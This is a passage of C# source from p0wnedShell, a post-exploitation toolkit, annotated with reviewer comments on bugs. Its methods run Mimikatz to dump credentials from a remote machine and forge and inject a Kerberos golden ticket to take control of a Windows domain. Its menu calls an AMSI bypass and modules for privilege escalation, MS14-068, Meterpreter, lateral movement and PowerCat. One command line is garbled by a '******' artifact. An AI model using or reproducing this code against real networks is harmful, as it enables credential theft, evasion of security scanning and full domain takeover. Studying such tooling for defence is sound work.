            string[] toPrint = { "* Execute Mimikatz on a remote computer to dump credentials.        *" };
            Program.PrintBanner(toPrint);

            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("[+] For this attack to succeed, you need to have remote Admin privileges.\n");
            Console.ResetColor();
            Console.Write("[+] Do you have the required permissions (e.g. Domain Admin)? (y/n) > ");
            string Hostname = null;
            string Creds    = null;
            // NOTE(review): a null line (end of input) makes input.ToLower() throw.
            string input    = Console.ReadLine();

            switch (input.ToLower())
            {
            case "y":
                Console.Write("\n[+] Please enter the fqdn hostname of the machine you want to dump the credentials (e.g. dc1.gotham.local) > ");
                Console.ForegroundColor = ConsoleColor.Green;
                // ReadLine already strips the line terminator, so the TrimEnd should be a no-op.
                Hostname = Console.ReadLine().TrimEnd('\r', '\n');
                Console.ResetColor();
                // Only the empty string is rejected; no other host-name validation.
                if (Hostname == "")
                {
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("\n[+] This is not a valid hostname, please try again\n");
                    Console.ResetColor();
                    Console.WriteLine("Press Enter to Continue...");
                    Console.ReadLine();
                    return;
                }
                break;

            case "n":
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] First try to elevate your permissions.\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;

            default:
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] Wrong choice, please try again!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            string Remote_Mimikatz = "Invoke-Mimikatz -DumpCreds -ComputerName \"" + Hostname + "\"";

            // First execution: result kept only to judge success by its length.
            try
            {
                Creds = Pshell.RunPSCommand(Remote_Mimikatz);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            // Five characters or fewer is taken to mean the remote call produced nothing useful.
            if (Creds.Length <= 5)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] Oops something went wrong, maybe a wrong Hostname?\n");
                Console.ResetColor();
            }
            else
            {
                // Second execution of the same command; Creds itself is never printed.
                Console.WriteLine(Pshell.RunPSCommand(Remote_Mimikatz));
            }
            Console.WriteLine("Press Enter to Continue...");
            Console.ReadLine();
            return;
        }
        /// <summary>
        /// Interactive menu action. Requires the machine to be domain-joined
        /// (<c>Domain.GetComputerDomain()</c>), prompts for a 32-character krbtgt hash and a user
        /// name, resolves the domain name, PDC and domain SID, then runs three Mimikatz commands
        /// through <c>Pshell.RunPSCommand</c>: <c>kerberos::golden</c> to write a ticket file under
        /// <c>Program.P0wnedPath()</c>, <c>kerberos::ptt</c> to load it, and a directory listing of
        /// the PDC's C$ share as the success check. On a failed check the ticket file is deleted
        /// and <c>kerberos::purge</c> is run.
        /// </summary>
        /// <remarks>
        /// Review notes on the code as written (nothing changed here):
        /// <list type="bullet">
        /// <item>The ticket file <c>P0wnedPath()\&lt;name&gt;.ticket</c> is only deleted on the
        /// failure branch; on success it stays on disk, which is a durable forensic artifact.</item>
        /// <item><c>SuperPower</c> starts as null and is only set inside a try block; if
        /// RunPSCommand throws, <c>SuperPower.Length</c> raises NullReferenceException.</item>
        /// <item>The success branch runs <c>DC_Listing</c> a second time instead of printing
        /// the captured <c>SuperPower</c>.</item>
        /// <item>The hash check is length-only (32 chars), not a hex check; the user name is
        /// used unvalidated in a file path and in the command text.</item>
        /// <item>The <c>"******"</c> in the golden-ticket command line looks like a redaction
        /// artifact of the listing rather than the author's code: as printed it is not valid C#
        /// (two string literals with bare <c>*</c> tokens between them).</item>
        /// </list>
        /// </remarks>
        public static void GoldenTicket()
        {
            string[] toPrint = { "* Use Mimikatz to generate a Golden Ticket for the Domain           *" };
            Program.PrintBanner(toPrint);

            string DomainJoined = String.Empty;

            try
            {
                DomainJoined = Domain.GetComputerDomain().Name;
            }
            catch
            {
                // Any failure to resolve the computer's domain ends the action here.
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Looks like our machine is not joined to a Windows Domain.\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("[+] For this attack to succeed, we need to have the ntlm hash of the krbtgt account.");
            Console.WriteLine("[+] We can get this hash using Mimikatz DCSync.\n");
            Console.ResetColor();
            Console.Write("[+] Do you have the ntlm hash of the krbtgt account? (y/n) > ");
            string krbtgt_hash = null;
            string input       = Console.ReadLine();

            // NOTE(review): culture-sensitive ToLower; dereferences a null result from ReadLine.
            switch (input.ToLower())
            {
            case "y":
                Console.Write("\n[+] Please enter the hash of our sweet krbtgt account > ");
                Console.ForegroundColor = ConsoleColor.Green;
                krbtgt_hash             = Console.ReadLine();
                Console.ResetColor();
                // Length-only validation; content is not checked for hex characters.
                if (krbtgt_hash.Length != 32)
                {
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("\n[+] This is not a valid ntlm hash, please try again\n");
                    Console.ResetColor();
                    Console.WriteLine("Press Enter to Continue...");
                    Console.ReadLine();
                    return;
                }
                break;

            case "n":
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] First try to get this hash using Mimikatz DCSync or a NTDS.dit dump.\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;

            default:
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] Wrong choice, please try again!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            // Domain name and PDC come from the directory; the SID is obtained via a PowerShell call below.
            Domain           domain     = Domain.GetCurrentDomain();
            DomainController Current_DC = domain.PdcRoleOwner;
            string           DomainName = domain.ToString();

            Console.WriteLine("[+] First return the name of our current domain.\n");
            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine(DomainName);
            Console.ResetColor();

            Console.WriteLine("\n[+] Now return the SID for our domain.\n");
            // Not wrapped in try/catch, unlike the other RunPSCommand calls in this method.
            string DomainSID = Pshell.RunPSCommand("Get-DomainSID").ToString().TrimEnd('\r', '\n');

            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine(DomainSID);
            Console.ResetColor();

            Console.Write("\n[+] Finally enter the name of the Super Human you want to be: ");
            Console.ForegroundColor = ConsoleColor.Green;
            // Used verbatim as part of a file name and of the command text; no validation.
            string Super_Hero = Console.ReadLine();

            Console.ResetColor();

            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("\n[+] Now wait while generating a forged Ticket-Granting Ticket (TGT)...\n");
            Console.ResetColor();

            // NOTE(review): the "******" below appears to be a listing/redaction artifact, not valid C# as shown.
            string Golden_Ticket = "Invoke-Mimikatz -Command '\"kerberos::purge\" \"kerberos::golden /domain:" + DomainName + " /user:"******" /sid:" + DomainSID + " /krbtgt:" + krbtgt_hash + " /ticket:" + Program.P0wnedPath() + "\\" + Super_Hero + ".ticket\"'";

            try
            {
                Console.WriteLine(Pshell.RunPSCommand(Golden_Ticket));
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            // Success of the previous step is judged solely by the ticket file existing on disk.
            if (File.Exists(Program.P0wnedPath() + "\\" + Super_Hero + ".ticket"))
            {
                string Pass_The_Ticket = "Invoke-Mimikatz -Command '\"kerberos::ptt " + Program.P0wnedPath() + "\\" + Super_Hero + ".ticket\"'";
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Now lets inject our Kerberos ticket in the current session\n");
                Console.ResetColor();
                try
                {
                    Console.WriteLine(Pshell.RunPSCommand(Pass_The_Ticket));
                }
                catch (Exception e)
                {
                    Console.WriteLine(e.Message);
                }
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Oops something went wrong, please try again!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }
            string DC_Listing = "Get-ChildItem \\\\" + Current_DC + "\\C$";
            string SuperPower = null;   // stays null if RunPSCommand throws below

            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("\n[+] And finally check if we really have SuperPower:\n");
            Console.ResetColor();
            try
            {
                SuperPower = Pshell.RunPSCommand(DC_Listing);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            // NOTE(review): throws NullReferenceException when the try block above failed.
            if (SuperPower.Length <= 5)
            {
                string Purge_Ticket = "Invoke-Mimikatz -Command '\"kerberos::purge\"'";
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Oops something went wrong, probably a wrong krbtgt Hash? Please try again!\n");
                Console.WriteLine("[+] Let's purge our invalid Ticket!\n");
                Console.ResetColor();
                // The ticket file is removed only on this failure path.
                File.Delete(Program.P0wnedPath() + "\\" + Super_Hero + ".ticket");
                try
                {
                    Console.WriteLine(Pshell.RunPSCommand(Purge_Ticket));
                }
                catch (Exception e)
                {
                    Console.WriteLine(e.Message);
                }
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("\n[+] OwYeah, " + Super_Hero + " you are in Full Control of the Domain :)\n");
                Console.ResetColor();
                // NOTE(review): re-runs the listing rather than printing the SuperPower already captured;
                // the ticket file is left on disk on this path.
                Console.WriteLine(Pshell.RunPSCommand(DC_Listing));
            }
            Console.WriteLine("Press Enter to Continue...");
            Console.ReadLine();
            return;
        }
        /// <summary>
        /// Program entry point. Sets the console title and window size, reads
        /// <c>PROCESSOR_ARCHITECTURE</c>, and if <c>Pshell.EnvironmentHelper.RtlGetVersion()</c>
        /// reports a value above 6.3 calls <c>AmsiBypass.Amsi(Arch)</c>. Then loops on
        /// <c>DisplayMenu()</c>, dispatching options 1-16 to the corresponding module, until the
        /// user enters 17. On exit, deletes <c>Amsi.dll</c> from <c>Program.P0wnedPath()</c> if present.
        /// </summary>
        /// <remarks>
        /// Review notes on the code as written (nothing changed here):
        /// <list type="bullet">
        /// <item>The <c>default</c> branch prints the farewell message for every value outside 1-16,
        /// but the loop only exits on 17, so any other value prints the farewell and then shows the
        /// menu again.</item>
        /// <item><c>Arch</c> is null when the environment variable is absent; the <c>== "x86"</c>
        /// comparison tolerates that, but it is also passed to <c>AmsiBypass.Amsi</c> — how that
        /// method handles null is not visible here.</item>
        /// <item><c>Console.SetWindowSize</c> can throw when there is no interactive console or the
        /// requested size is not allowed; there is no handler around it.</item>
        /// <item>The existence check and deletion of <c>Amsi.dll</c> at exit imply the file is
        /// dropped on disk earlier (presumably by <c>AmsiBypass.Amsi</c>); the file create/delete
        /// pair is an on-disk artifact that file-system auditing can observe.</item>
        /// </list>
        /// </remarks>
        public static void Main()
        {
            Console.Title = "p0wnedShell - PowerShell Runspace Post Exploitation Toolkit";
            // May throw if no console is attached or the size is rejected; no handler here.
            Console.SetWindowSize(Math.Min(120, Console.LargestWindowWidth), Math.Min(55, Console.LargestWindowHeight));
            string  Arch               = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
            string  LatestOSVersion    = "6.3";
            decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);

            // Version gate: only OS versions reported above 6.3 take this branch.
            if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
            {
                AmsiBypass.Amsi(Arch);
            }

            int userInput = 0;

            do
            {
                userInput = DisplayMenu();
                switch (userInput)
                {
                case 1:
                    Pshell.PowerView();
                    break;

                case 2:
                    SitAwareness.Menu();
                    break;

                case 3:
                    Pshell.PortScan();
                    break;

                case 4:
                    Execution.Menu();
                    break;

                case 5:
                    Pshell.PowerUp();
                    break;

                case 6:
                    GetSystem.Menu();
                    break;

                case 7:
                    Inveigh.Menu();
                    break;

                case 8:
                    Pshell.GetGPPPassword();
                    break;

                case 9:
                    Roast.Menu();
                    break;

                case 10:
                    ADAttacks.Menu();
                    break;

                case 11:
                    Exploits.Menu();
                    break;

                case 12:
                    // Option 12 is gated on the 32-bit build; a null Arch falls into the else branch.
                    if (Arch == "x86")
                    {
                        Pshell.MS14_068();
                    }
                    else
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("\n[+] Sorry this option only works for p0wnedShellx86\n");
                        Console.ResetColor();
                        Console.WriteLine("Press Enter to Continue...");
                        Console.ReadLine();
                    }
                    break;

                case 13:
                    p0wnedMeter.Menu();
                    break;

                case 14:
                    LatMovement.Menu();
                    break;

                case 15:
                    PowerCat.Menu();
                    break;

                case 16:
                    Pshell.InvokeShell();
                    break;

                default:
                    // Reached for 17 (exit) and for any other unrecognised value.
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("\nSee you later Alligator ;)");
                    Console.ResetColor();
                    break;
                }
            } while (userInput != 17);   // only 17 terminates the loop

            // Cleanup of the on-disk Amsi.dll artifact at exit.
            if (File.Exists(Program.P0wnedPath() + "\\Amsi.dll"))
            {
                File.Delete(Program.P0wnedPath() + "\\Amsi.dll");
            }
        }